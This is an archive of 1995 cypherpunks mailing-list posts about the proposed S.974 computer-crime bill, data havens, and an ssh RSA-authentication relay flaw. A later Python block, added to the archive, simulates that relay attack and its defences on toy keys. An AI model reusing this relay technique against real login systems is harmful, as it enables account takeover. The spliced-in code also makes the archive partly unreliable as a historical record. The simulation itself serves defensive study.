From: bigdaddy@ccnet.com (Le Dieu D'Informations Insensibles...)
Date: Thu, 13 Jul 95 20:54:51 PDT
To: Jon Lasser <jlasser@rwd.goucher.edu>
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <199507140351.UAA23945@ccnet.ccnet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>On Thu, 13 Jul 1995, Ray Arachelian wrote:

>How about "not respecting international copyright law, and not having 
>extradition treaties with the US" ... set up a data haven, we now know 
>why we need it soon... charge by the Kbyte, automate the billing, and relax.
        How about one of the Middle Eastern countries? Saudi Arabia would have
been good until recently, but they've just signed the Berne Convention on
copyrights...so there's one down. On the plus side, the authorities haven't
banned crypto yet. Why? One only wonders.
        Kuwait has ready-made Internet access, but is, if I'm not mistaken,
also a signatory to the international copyright convention. Both Kuwait and
the KSA are also very friendly with the U.S., though I cannot name any
specific case of extradition between the two countries. Given the choice
between a Saudi court and a U.S. one, however, I'd pick the U.S. :-)
        Why not Yemen, Oman, or Lebanon? We'd have to start an ISP by
ourselves, but the countries are small enough...or just recovering from civil
war...such that nothing would be noticed (fingers crossed). Oman has CISnet
access...maybe something could be built on that. For Yemen or Lebanon, we'd
have to get a satellite hookup (which presents its own problems).
        Besides, Oman has simply _beautiful_ scenery. :-)        
>Anybody seriously interested? 
        In theory. To actually set up a data haven takes more resources than I
have. IMHO, however, one of the smaller Middle Eastern countries would be
good, as they generally don't (unless I'm mistaken) have reciprocal copyright
treaties with the U.S., are not generally signatories of the Berne Convention
(except KSA and the UAE and maybe Kuwait), and do not look likely to outlaw
crypto. 

Thoughts?

David Molnar

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----

lo...look to the sig, for there will be no sign






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Stuart <fstuart@vetmed.auburn.edu>
Date: Thu, 13 Jul 95 18:56:00 PDT
To: jya@pipeline.com
Subject: Re: co-sponsors S.974
Message-ID: <199507140155.UAA00007@snoopy.vetmed.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


>I searched Thomas and couldn't find any evidence of 
>co-sponsors to the  Senate bill. Am I wrong here?
[...]
>Anyone got better info on yes/no sponsors or seen the DOJ press
>release?

There are 2 bills.  Senator Grassley's repressive Anti-Electronic Racketeering
Act of 1995 (S.974) has no co-sponsors.  

Senators Leahy, Kyl, and Grassley co-sponsored the National Information
Infrastructure Protection Act of 1995 (S.982).  I haven't seen any analysis
of it, but I did a quick read of it and didn't see anything alarming.


                          | Putt's Law:
Frank Stuart              | Technology is dominated by two types of people:
fstuart@vetmed.auburn.edu | Those who understand what they do not manage.
stuarfc@mail.auburn.edu   | Those who manage what they do not understand.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 13 Jul 95 18:00:55 PDT
To: cypherpunks@toad.com
Subject: co-sponsors S.974
Message-ID: <199507140100.VAA00681@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by perry@imsi.com (Perry E. Metzger) on Thu, 
13 Jul  4:51 PM

>I searched Thomas and couldn't find any evidence of 
>co-sponsors to the  Senate bill. Am I wrong here?


As you know, gnu@toad.com sent the EFF analysis which included:

   > From: ssteele@eff.org (Shari Steele)
   > ...
   > Fortunately, the bill does not have a very promising
   > future.  The bill has  no co-sponsors.  It was immediately
   > referred to the Committee on the Judiciary, where it
   > currently sits.  LEXIS's bill tracking report only  gives
   > it a 10% chance of passing out of the committee. ...


In contrast, the following is from law list Cyberia-L today:


   > At  8:17 AM 7/13/95 -0400, James R. Coleman wrote:

   >> Anyone know the committee status of this bill.  Does it
   >> have co-sponsors?  House sponsors?  Are hearings
   >> scheduled?  Or is Grassley not serious but trying to get
   >> some press in Des Moines?

   > The bill was co-sponsored by Sens. Kyl (R-AZ) and Leahy
   > (D-VT). It has the enthusiastic support of the
   > administration. In a DOJ press release  following its
   > introduction, AG Reno is quoted as saying "computer crime
   > is fast becoming everyone's problem. I'm encouraged that
   > this bill is off to a  bipartisan start, and I hope
   > Congress will move quickly to enact it." 
   >
   > If there's a companion bill in the House, I'm not aware of
   > it.
   >
   > John Noble


Anyone got better info on yes/no sponsors or seen the DOJ press
release?











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Thu, 13 Jul 95 19:00:08 PDT
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: Fight, or Roll Over?
In-Reply-To: <9507140155.AA13373@snark.imsi.com>
Message-ID: <Pine.ULT.3.91.950713205857.19725A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jul 1995, Perry E. Metzger wrote:

> Anyone who is saying that it is impossible to fight the legislative
> battles hasn't been thinking. It takes millions of dollars,  but there
> is a lot of money out there to be had in my opinion.

Nobody's saying it's impossible, what we're saying is that we don't have 
the resources to DO that on the scale that is needed.  Maybe Microsoft 
does, but we don't.  What we can do, however, is to shape the culture of 
the net.  That culture will have to eventually be listened to by DC.

____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Thu, 13 Jul 95 19:15:35 PDT
To: "David K. Merriman" <merriman@arn.net>
Subject: Re: Root Causes
In-Reply-To: <199507140151.UAA01504@arnet.arn.net>
Message-ID: <Pine.ULT.3.91.950713211304.19919A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


If I understand, you can't sue the government for just trying to pass a
law, or for even passing it.  What has to happen is that somebody needs
to be arrested and charged with breaking the law before you can challenge
them.

Although publishing an "Enemies of the Constitution" list all over the
net, listing which congress-critters opposed the constitution (such as
Exon) might be interesting.  Might even make a good web project.  *ponders*

____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Anderson <ericande@linknet.kitsap.lib.wa.us>
Date: Thu, 13 Jul 95 21:30:36 PDT
To: Ray Arachelian <sunder@escape.com>
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <Pine.SUN.3.91.950713163526.25718G-100000@escape.com>
Message-ID: <Pine.SUN.3.91.950713212826.13152A-100000@linknet.kitsap.lib.wa.us>
MIME-Version: 1.0
Content-Type: text/plain


What time is the Five minute hate?


Amerika: land of the Freeh, home of the slave




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an215712@anon.penet.fi
Date: Thu, 13 Jul 95 15:26:09 PDT
To: cypherpunks@toad.com
Subject: LD tentacle?
Message-ID: <9507132146.AA04231@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


has anyone heard of John Bass? based on this recent message, in which he
melodramatically tries to stir the shit on a RMIUG list (rocky mountain 
internet user group) I wonder if L.D. is in fact a John Bass tentacle, or
vice versa...


From: jbass@dmsd.com (John L. Bass)
To: rmiug-discuss@xor.com
Subject: The legacy of Ted Smith's, Gary Anderson's, and Mary Newell's
    actions.


        The legacy of Ted Smith's, Gary Anderson's, Mary Newell's, and
possibly Scott Crawford's (since it was difficult to figure out which side
he was on) unethical postings combined with inaction of the elected and
natural leaders of RMIUG will reflect poorly on the group and its leaders
for years to come.  This legacy includes the inaction of the entire readership
of rmiug-discuss as well (with the exception of Gabe who is a guest reader
from the east coast).

        Leadership has a number of grave responsibilities and difficult
choices - the foremost of which is the preservation of ethical and moral
behavior in the group - to protect the reputation of BOTH the group and its
elected and natural leadership. In some instances, none of the available
options may be popular - but inaction is by far a greater failing.

        I deeply regret the events which have unfolded over the last
two weeks.  Making 10 of 31 posts in a group of 11 posters regarding
the MS topic of 6/29 should not be a capital offense. Nor should
questioning a board member's assertions about the use of the list
in the face of historical usage. Nor should questioning the tolerance
of highly unethical private and public attacks upon posters. On the
29th I heeded Alek's request after reading it, and made a single additional
post. As Gabe noted, we were already winding the debate down. Unfortunately,
the several 1-2 hour delivery time of rmiug-discuss delayed Alek's comments.
I am deeply disappointed that the lessons learned from the last two weeks
have come at a great cost to all.  I am more concerned the examples set here
by Ted Smith, Gary Anderson, and  Mary Newell may greatly limit discussion
and participation in RMIUG.

        Each of you *IS* RMIUG. As a group your ethical, intellectual,
and moral guidance and leadership can not be ignored in difficult or
unpopular times.  Many have chosen in the last 3 days to vote with
their feet out of disgust. While they can distance themselves from the
unpleasant events this way, it is just another form of failing to take
more positive steps - maybe out of fear of being targeted themselves.

        I have many questions about why rmiug at nearly 700 people was
unable to maintain a higher level of content (and traffic) as a tool to
augment the learning curve of the many newcomers to the internet, expand
the horizons of all, and form the dialog to bind the readership into
an effective functioning group. A highly successful topic in a large
diverse group this size will only have the interest of 10-30% of the
readership, just as the meetings do not benefit and attract the entire
group each month. A topic that produces content from 7 posters over
26 messages should not create a fire. A good highly successful topic
which really involves the readership, might draw comment from 1% of
the readership, some 60-70 people, and include maybe a hundred or
two posts. And several at the same time, even more.  Expecting the
ACCEPTABLE volume of the list to remain under 3-4 per day is a great
burden on the usefulness of this list.

        One difficulty has been that some readers use ISPs and BBSs
with extremely small quotas and read their mailboxes infrequently.
They have been extremely frustrated at their mbox/quota overflowing
from traffic around 50-100KB/wk. For others it has been the relatively
poor user interface of some mail readers which limits their ability
to select the articles they wish to read.  It is hard sometimes to
understand the small quotas in the face of disk space costing less
than $.30-.50/MB.  Maybe one project of this group should be to help
find/provide entry level members better access and tools at a nominal
or free cost.

        Despite Ted Smith's slander and assertions to the contrary,
I bring some objectiveness and experience to issues many would prefer
to ignore.  I loathe the current PC vogue to avoid conflict at all costs
- often with thick sarcasm and an unwillingness to listen to conflicting
view points.  I am direct, up front, listen well, accept  "constructive
criticism", and enjoy reasoned civil debate. I have the highest respect
for someone who can present/defend their views with a reasoned argument
based upon fact and experience, and in the face of equally reasoned
arguments also based upon fact and experience, augment/change their
position or possibly agree to disagree when no common ground exists.

        I've been active some dozen times as the leading exec member of both
professional and civic orgs. I last ran a SF Bay area unix users group
known as UNIOPS/Silicon Valley Net(SVNet) for over 3 years almost single
handedly - including printing and addressing as much as 2000-4000 meeting
announcements for bulk mail each month.  With current and early breaking
topics and speakers I was often capacity limited by the 800 seat room ...
often standing room only.  When I moved it took me a year, and going dark
twice, before I could find a team willing to take over the burden and
continue what I had started.  Before that I ran two different groups with
semi-annual international Unix conferences with between 300 and 1000
attendees as "West Coast Unix Users Group" at SRI International
(formerly Stanford Research Institute) and as UNIOPS (before helping
found /USR/GROUP now known as UNIFORM). I also spent two years on the
/usr/group UNIX standards committee as the "Extensions Sub-committee Chairman".
Both concurrent and prior to that I did my duty as board member of several
Square Dance Clubs and Campus orgs. My public life has been second to my
family for the last 7 years.

        I suspect in part, the hostility here results from a previous
unpopular dispute where I called for the resignation of Guy Cook after
having CSN drop all the mail for dmsd.com on the floor for many weeks,
and then publicly deny that CSN had done so (as well as a number of
other management failings at CSN). Guy and CSN have come a long way
in the year and a half since, to become probably the best ISP in the
state. The road was rocky, but all have learned from the experience,
and I hope moved forward, including I.

John L. Bass

FYI: rmiug-discuss volume by day from 5/18 to present.


30 |-------+---------+---------+---------+----#----+------
   |       |         |         |         |         |     
   |       |         |         |         |         |     
   |       |         |         |         |         |     
   |       |         |         |         |         |     
25 |       |         |         |         |         |     
   |       |         |         |         |         |     
   |       |         |         |         |         |     
   |       |         |         |         |         |     
   |       |         |         |         |         |     
20 |-------+---------+---------+---------+---------+#-----
   |       |         |         |         |         |     
   |       |         |         |         |         |     
   |       |         |         |         |         |     
   |       |         |         |         |         |     
15 |       |         |         |         |         |     
   |       |         |         |         |         |     
   |       |         |         |         |         |     
   |       |         |         |         |         | #   
   |       |         |         |         |         |     
10 |-------+---------+---------+---------+---------+------
   |       #         |         |         |         |  #  
   |       |         |         |         |         |     
   |       |         |         |         |     #   |   # 
   |       |         |         #     #   |         |     
 5 |       |         |         |         |         #     
   |      #|# #      |         |#        |         |     
   | #   # |      ## |  #      |         |         |     #
   |       |   #     |#  ##    |      #  |   #    #|     
   |# ##   |         | #       |   #   # | #    #  |    #
 0 +----#--+-#--##--##-----####+-##-#---###-#----#-+------
    112222222222330000000001111111111222222222230000000001
    890123456789011234567890123456789012345678901234567890
    May           June                          July

    0000 0000 00  00     00    00  0 000   0 0300 00210000 Group `#'
    1211 3494 42  33  21322    64  1 621   1 2071 25029713 Volume


  *** You received this message because you are on an RMIUG email list   ***
  *** Send email to rmiug@rmiug.org for RMIUG & subscription information ***


----------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
If you reply to this message, your message WILL be *automatically* anonymized
and you are allocated an anon id. Read the help file to prevent this.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 13 Jul 95 18:48:18 PDT
To: cypherpunks@toad.com
Subject: DOJ Press Release, S. 974?
Message-ID: <199507140148.VAA07551@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   It is not obvious that this refers to S. 974 but seems
   to be the press release John Noble cites on Cyberia-L.
   Did anyone see news reports on this?

   
   URL: gopher://justice2.usdoj.gov/00/press/previous/June95/370.txt


   For Immediate Release                                    AG
   Thursday, June 29, 1995                      (202) 616-2777
                                            TDD (202) 514-1888


                Administration, Congress Introduce
                  New Computer Crime Legislation

   Washington, D.C. -- Attorney General Janet Reno today
   announced that the Clinton Administration, along with
   Senators John Kyl, Patrick Leahy, and Charles Grassley has
   introduced legislation dramatically increasing federal
   protections of data confidentiality.  Current law protects
   the confidentiality of financial information.  Today's
   legislation would protect all government data against
   access without permission, as well as criminalizing access
   by government employees who exceed their authority to gain
   access to government data.

   "As technology advances, computer crime has grown," said
   Reno. "We have to ensure that the law keeps up with
   changing times."

   With the phenomenal growth of legitimate computer use has
   come a similar growth in computer crime and the problem of
   "hackers" who break into computer networks without
   authority to steal information or damage computer systems. 
   In addition to penetrating telephone networks to disrupt
   phone service and wiretap calls, many hackers attack
   government and private computers to steal valuable
   information.

   According to the Computer Emergency Response Team at
   Carnegie Mellon University, during the past four years, the
   number of reported intrusions on the Internet has increased
   498 percent, and the number of computer sites affected has
   increased 702 percent.

   "Computer crime is fast becoming everyone's problem," said
   Reno. "I'm encouraged that this bill is off to a bipartisan
   start, and I hope Congress will move quickly to enact it."

   The new Act provides three new tools to address this
   problem:

   +  More computers would be protected by federal law.  Under
      the new law, a "protected computer" would be defined as
      any government computer, financial institution computer,
      or any other computer used in interstate or foreign
      commerce or communications.  Under current law,
      computers are not adequately protected from foreign
      hackers, and no federal jurisdiction can be obtained
      when the hacker's and the victim's computers are located
      in the same state.

   +  Under the new law, all government data would be
      protected, and the federal government could prosecute
      individuals who access government data for their own
      use.  Additionally, private data would be protected when
      hackers steal information from computers located across
      state or national borders. Currently, only financial
      data and classified information are strictly protected
      from improper access.

   +  The integrity and availability of data would be better
      protected under the new law because it ensures that all
      hackers are punished adequately.  Current law provides
      penalties for intentional damage, but hackers who
      recklessly or accidentally damage information or systems
      face little or no penalties.

                                ###

   95-370

[End press release]







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 13 Jul 95 18:57:03 PDT
To: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Subject: Re: Fight, or Roll Over?
In-Reply-To: <Pine.ULT.3.91.950713170704.14454B-100000@krypton.mankato.msus.edu>
Message-ID: <9507140155.AA13373@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



"Robert A. Hayden" writes:
> On Thu, 13 Jul 1995, Douglas Barnes wrote:
> 
> > Since the Anti-Electronic Racketeering Act of 1995 might as well
> > be called the "Anti-Cypherpunk Act of 1995", I'm surprised to see
> > Tim throw in the towel already, when the bill hasn't even made it
> > through committee yet.
> 
> I don't think Tim threw in the towel on this bill, but has come to
> realize that the overall war on privacy cannot be won by concentrating on 
> the individual battles.

That's true. However, I think that one strategic move would be to get a
PR firm involved that is capable of severely embarrassing any politico
who puts his name on any of these proposals. After two or three of those
they start getting gun-shy.

Folks, this isn't trivial. It isn't an easy thing to do by any
means. However, it is far from impossible.

> We've ALL got to take a deep breath and come up with a different
> plan of attack; a plan that the TLAs and spooks will be unable to
> defend against.

There is no such plan. They can't control the technology in the long
run but they can throw us all in jail in the short run. I have
substantial personal interest in keeping this stuff legal, and I don't
give a flying fig *who* sponsors legislation.

Do you think the agricultural industry lies down every time that
congress proposes to cut subsidies? Do you think that the gun lobby
lies down and plays dead? They get a bad bill proposed virtually every
week. Do you think the health care industry would have been correct to
say "oh, Hillary has us bushwhacked -- this is a major
initiative. Guess we'd better give up."

Anyone who is saying that it is impossible to fight the legislative
battles hasn't been thinking. It takes millions of dollars,  but there
is a lot of money out there to be had in my opinion.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 13 Jul 95 19:04:34 PDT
To: Tatu Ylonen <ylo@cs.hut.fi>
Subject: Re: Ssh security hole?
In-Reply-To: <199507132303.CAA18383@shadows.cs.hut.fi>
Message-ID: <9507140202.AA13400@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Tatu Ylonen writes:
> (I'll forward your message to a couple of lists where it might be
> of interest; the original message is at end.)
> 
> I think you are right in your analysis.  There is indeed a problem
> with RSA authentication.  Basically what this means is that if you log
> into a corrupt host, that host can at the same time log into another
> host with your account (by fooling you to answer to the request)
> provided that you use the same RSA identity for both hosts.
> 
> A workaround is to use a different identity for each host you use.
> The default identity can be specified on a per-host basis in the
> configuration file, or by -i options.

Might I suggest that a better solution would be to adapt the station
to station protocol, or, even better, Photuris...

.pm
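
The relay described in the message above, and the per-host-identity workaround, modelled as an added example (not ssh's code and not part of the original messages). It uses textbook RSA over constructed primes; the host names, the `proof` function and the host-bound variant (a simplified stand-in for tying authentication to the authenticated exchange, in the spirit of the station-to-station suggestion) are assumptions.

```python
"""Toy model of the relay against RSA challenge-response login, plus two defences.
Textbook RSA over constructed primes, for illustration only."""
import hashlib
import secrets

def make_identity(p, q, e=65537):
    """Build (public, private) textbook-RSA keys from two primes."""
    n, phi = p * q, (p - 1) * (q - 1)
    return (n, e), (n, pow(e, -1, phi))

def proof(secret, host_name, bound):
    """Client's answer: a hash of the decrypted challenge, optionally bound to
    the host the client believes (has verified) it is logging in to."""
    data = secret.to_bytes(64, "big")
    if bound:
        data += host_name.encode()
    return hashlib.sha256(data).digest()

class Server:
    """Accepts a login when the client proves it can decrypt the challenge."""
    def __init__(self, name, authorized_pub):
        self.name, self.authorized_pub, self._secret = name, authorized_pub, None

    def challenge(self):
        n, e = self.authorized_pub
        self._secret = secrets.randbelow(n - 2) + 2
        return pow(self._secret, e, n)      # only the key owner can decrypt

    def verify(self, response, bound):
        return secrets.compare_digest(response, proof(self._secret, self.name, bound))

class Client:
    """Holds one private key per host name (possibly the same key for all)."""
    def __init__(self, identities):
        self.identities = identities

    def respond(self, host_name, challenge, bound):
        n, d = self.identities[host_name]
        return proof(pow(challenge, d, n), host_name, bound)

def direct_login(client, server, bound):
    """Ordinary login: the client talks to the server it intends to reach."""
    return server.verify(client.respond(server.name, server.challenge(), bound), bound)

def relayed_login(client, corrupt_name, target, bound):
    """The user logs in to `corrupt_name`; that host forwards `target`'s
    challenge as its own. Returns True if `target` accepts the answer."""
    forwarded = target.challenge()
    return target.verify(client.respond(corrupt_name, forwarded, bound), bound)

def run_scenarios():
    # Constructed keys built from known Mersenne primes (sample values).
    pub_a, priv_a = make_identity(2**89 - 1, 2**107 - 1)
    pub_b, priv_b = make_identity(2**61 - 1, 2**127 - 1)
    corrupt, target_name = "corrupt.example", "target.example"

    shared = Client({corrupt: priv_a, target_name: priv_a})
    per_host = Client({corrupt: priv_a, target_name: priv_b})
    return {
        # Same identity on both hosts, unbound answer: the relay is accepted.
        "shared_identity_relay": relayed_login(
            shared, corrupt, Server(target_name, pub_a), bound=False),
        # Workaround from the message: a different identity per host.
        "per_host_identity_relay": relayed_login(
            per_host, corrupt, Server(target_name, pub_b), bound=False),
        # Shared identity, but the answer names the host the client verified.
        "host_bound_relay": relayed_login(
            shared, corrupt, Server(target_name, pub_a), bound=True),
        # The defences do not break legitimate logins.
        "per_host_direct": direct_login(
            per_host, Server(target_name, pub_b), bound=False),
        "host_bound_direct": direct_login(
            shared, Server(target_name, pub_a), bound=True),
    }

if __name__ == "__main__":
    for name, accepted in run_scenarios().items():
        print(f"{name:26s} accepted={accepted}")
```

The host-bound case only helps if the client has authenticated the host it is talking to, so that a corrupt host cannot present itself under the target's name.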




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: therogue@hopf.dnai.com (Eric Barnes)
Date: Thu, 13 Jul 95 22:09:00 PDT
To: ssteele@eff.org
Subject: Re: EFF analysis: Anti-Electronic Racketeering Act (S.974) (fwd)
Message-ID: <v01520d3eac2b45e2890c@[140.174.162.74]>
MIME-Version: 1.0
Content-Type: text/plain


Comments added by me to Grassley's speech.

Eric Barnes
>
>From: ssteele@eff.org (Shari Steele)
>
>*****  FEEL FREE TO DISTRIBUTE WIDELY  *****
>
>On June 27, Senator Grassley (R-Iowa) introduced the Anti-Electronic
>Racketeering Act, S.974.  The bill was designed "to prohibit certain acts
>involving the use of computers in the furtherance of crimes, and for other
>purposes."  Its immediate effect, among other things, would be to
>criminalize the posting of any encryption software on any computer network
>that foreign nationals can access (in other words, any computer network
>period).  Because of poor wording, the bill would probably also criminalize
>data compression and other non-cryptographic encoding schemes available on
>networks.  This includes the compression used in most of the images on
>Internet users' WWW homepages, not to mention uu and binhex encoding for
>transferring binary files via email, and even language encoding used to
>represent non-English characters, such as the SJIS scheme for representing
>Japanese characters.
>
>In addition, the bill seems to be directed at undermining two big fights
>we've successfully waged in the past:  the Steve Jackson Games decision
>against the United States Secret Service and the government's Clipper Chip
>proposal.
>
>Re:  Steve Jackson Games -- this bill would permit the government to avoid
>the notice requirements of the Privacy Protection Act if "there is reason
>to believe that the immediate seizure of such materials is necessary to
>prevent the destruction or altercation [very Freudian sic!] of such
>documents."  Furthermore, the government could use electronic evidence
>seized that had not been particularly described in a warrant if
>
>"the seizure is incidental to an otherwise valid seizure, and the
>government officer or employee-
>
>   ''(A) was not aware that work product material was among the data seized;
>
>   ''(B) upon actual discovery of the existence of work product materials, the
>government officer or employee took reasonable steps to protect the privacy
>interests recognized by this section, including-
>
>   ''(i) using utility software to seek and identify electronically stored data
>that may be commingled or combined with non-work product material; and
>
>   ''(ii) upon actual identification of such material, taking reasonable steps
>to protect the privacy of the material, including seeking a search warrant."
>
>Re:  Clipper Chip -- The bill would make it a crime "to distribute computer
>software that encodes or encrypts electronic or digital communications to
>computer networks that the person distributing the software knows or
>reasonably should know, is accessible to foreign nationals and foreign
>governments, regardless of whether such software has been designated as
>nonexportable."  However, there is an exception:  "It shall be an
>affirmative defense to prosecution under this section that the software at
>issue used a universal decoding device or program that was provided to the
>Department of Justice prior to the distribution."  This is essentially an
>attempt to sneak the key "escrow" provisions of the Clipper scheme in
>through a legislative back door.
>
>Fortunately, the bill does not have a very promising future.  The bill has
>no co-sponsors.  It was immediately referred to the Committee on the
>Judiciary, where it currently sits.  LEXIS's bill tracking report only
>gives it a 10% chance of passing out of the committee.
>
>I thought Senator Grassley's own statement when he introduced the bill is
>worth reading, so I'm attaching it here.  My favorite line is "Elliott Ness
>needs to meet the Internet."  This is especially ironic in light of recent
>comparisons of hysteria about "dangerous" material on the internet, and
>Prohibition.
>
>The bill itself follows.
>Shari
>
>>------------------------------------------------------------------------
>>Shari Steele, Director of Legal Services                 ssteele@eff.org
>>Electronic Frontier Foundation                      202/861-7700 (voice)
>>1667 K Street, N.W., Suite 801                        202/861-1258 (fax)
>>Washington, DC  20006-1605                            202/861-1224 (BBS)
>>
>>
>>
>>----------  Senator Grassley's Statement to the Senate  ----------
>>
>>   Mr. President, I rise this evening to introduce the Anti-electronic
>>Racketeering Act of 1995. This bill makes important changes to RICO and
>>criminalizes deliberately using computer technology to engage in criminal
>>activity. I believe this bill is a reasonable, measured and strong response
>>to a growing problem.  According to the computer emergency and response
>>team at Carnegie-Mellon University, during 1994, about 40,000 computer
>>users were attacked. Virus hacker, the FBI's national computer crime squad
>>has investigated over 200 cases since 1991. So, computer crime is clearly
>>on the rise.
>*Was this not the same Carnegie-Mellon University involved in the horrific
>Time Ragazine "Cyberporn" article?  The one which will take no
>responsibility for the incredibly poor research done by one of their
>undergraduates?  Which seems to take no stand on proper research procedures
>used by their students?
>>
>>   Mr. President, I suppose that some of this is just natural. Whenever man
>>develops a new technology, that technology will be abused by some. And that is
>>why I have introduced this bill. I believe we need to seriously reconsider the
>>Federal Criminal Code with an eye toward modernizing existing statutes and
>>creating new ones. In other words, Mr. President, Elliot Ness needs to
>>meet the
>>Internet.
>*Being a politician, of course he considers criminality natural.  It goes
>with the territory.  And like so many of them, drunk with their potential
>power over the people (Dear God, let us no longer speak of "servants of the
>People"), attacking every single user of computers, world wide at that, is
>also a "natural" response.
>>
>>   Mr. President, I sit on the Board of the Office of Technology Assessment.
>>That Office has clearly indicated that organized crime has entered
>>cyberspace in
>>a big way. International drug cartels use computers to launder drug money and
>>terrorists like the Oklahoma City bombers use computers to conspire to commit
>>crimes.
>*Ah..and notice how he carefully leaves out any empirical data?  This
>Board, whatever the hell it is, "has clearly indicated" something...which
>just happens to fit in with Grassley's political ambitions and desperate
>need to be the center of attention.  And so he raises the unfounded
>"organized crime" and "terrorist" and "conspiracy" flags to frighten us
>all.  And to make matters truly worse, there is no evidence or indication
>that the Internet was even used in the OK City debacle, much less
>encryption.  As a matter of fact, our vaunted FBI has yet to even bring an
>indictment in the case!
>>
>>   Computer fraud accounts for the loss of millions of dollars per year.
>*Mostly through the use of bank wires...not available to the rest of us.
>
>> And often times, there is little that can be done about this because the
>>computer
>>used to commit the crimes is located overseas. So, under my bill, overseas
>>computer users who employ their computers to commit fraud in the United States
>>would be fully subject to the Federal criminal laws.  Also under my bill, Mr.
>>President, the wire fraud statute which has been successfully used by
>>prosecutors for many users, will be amended to make fraudulent schemes
>>which use
>>computers a crime.
>*I can see it now.  You typed a letter on a computer?  You're dead,
>buddy!!!  And anyone who happened to have received that letter, whether
>involved or not, would also be guilty by association.  Good going,
>Grassley.  Fine grasp of the Constitution there.
>>
>>   It is not enough to simply modernize the Criminal Code. We also have to
>>reconsider many of the difficult procedural burdens that prosecutors must
>>overcome. For instance, in the typical case, prosecutors must identify a
>>location in order to get a wiretapping order. But in cyberspace, it is often
>>impossible to determine the location. And so my bill corrects that so that if
>>prosecutors cannot, with the exercise of effort, give the court a
>>location, then
>>those prosecutors can still get a wiretapping order. And for law
>>enforcers-both
>>State and Federal-who have seized a computer which contains both contraband or
>>evidence and purely private material, I have created a good-faith standard so
>>that law enforcers are not shackled by undue restrictions but will also be
>>punished for bad faith.
>*Oh, Dear God!  He's gonna protect us from the enforcers.  How terribly kind.
>>
>>   Mr. President, this brave new world of electronic communications and global
>>computer networks holds much promise. But like almost anything, there is the
>>potential for abuse and harm. That is why I urge my colleagues to support this
>>bill and that is why I urge industry to support this bill.
>*Oh, yes...let's be sure that any promise is nipped in the bud as our
>sacred government, which has shown such a dandy predilection for abuse of
>power through the years, is given access to any and all private
>communications, no matter from whom or to whom.  With a Senator like this,
>who needs a Fuhrer?  I hope Iowans take a long look at this idiot next
>time the ballots are being cast.
>>
>>   On a final note, I would say that we should not be too scared of
>>technology.
>>After all, we are still just people and right is still right and wrong is
>>still
>>wrong. Some things change and some things do not. All that my bill does is say
>>you can't use computers to steal, to threaten others or conceal criminal
>>conduct.
>*And this chump is willing to flush the entire Constitution down the toilet
>in order to save us all from that which can, and will, be done by many
>other means.  Notice his "all my bill does", then defines what he wants us
>to believe.  And this is one of the Republicans who has promised to get the
>Federal government off our backs?  Oh, yes, there *is* a Santa Claus,
>Virginia.  But be very careful of his hands when he gives you that fatherly
>hug.  This one will rape us all if given the chance!
>
>Eric Barnes
>>
>>   Mr. President, I ask unanimous consent that the text of the bill be printed
>>in the Record.
>>
>>   There being no objection, the bill was ordered to be printed in the Record,
>>as follows:
>>
>>   S. 974
>>
>>
>>
>>   SECTION 1. SHORT TITLE.
>>
>>   This Act may be cited as the ''Anti-Electronic Racketeering Act of 1995''.
>>
>>   SEC. 2. PROHIBITED ACTIVITIES.
>>
>>   (a) Definitions .-Section 1961(1) of title 18, United States Code, is
>>amended-
>>
>>   (1) by striking ''1343 (relating to wire fraud)'' and inserting ''1343
>>(relating to wire and computer fraud)'';
>>
>>   (2) by striking ''that title'' and inserting ''this title'';
>>
>>   (3) by striking ''or (E)'' and inserting ''(E)''; and
>>
>>   (4) by inserting before the semicolon the following: ''or (F) any act
>>that is
>>indictable under section 1030, 1030A, or 1962(d)(2)''.
>>
>>   (b) Use of Computer To Facilitate Racketeering Enterprise .-Section 1962 of
>>title 18, United States Code, is amended-
>>
>>   (1) by redesignating subsection (d) as subsection (e); and
>>
>>   (2) by inserting after subsection (c) the following new subsection:
>>
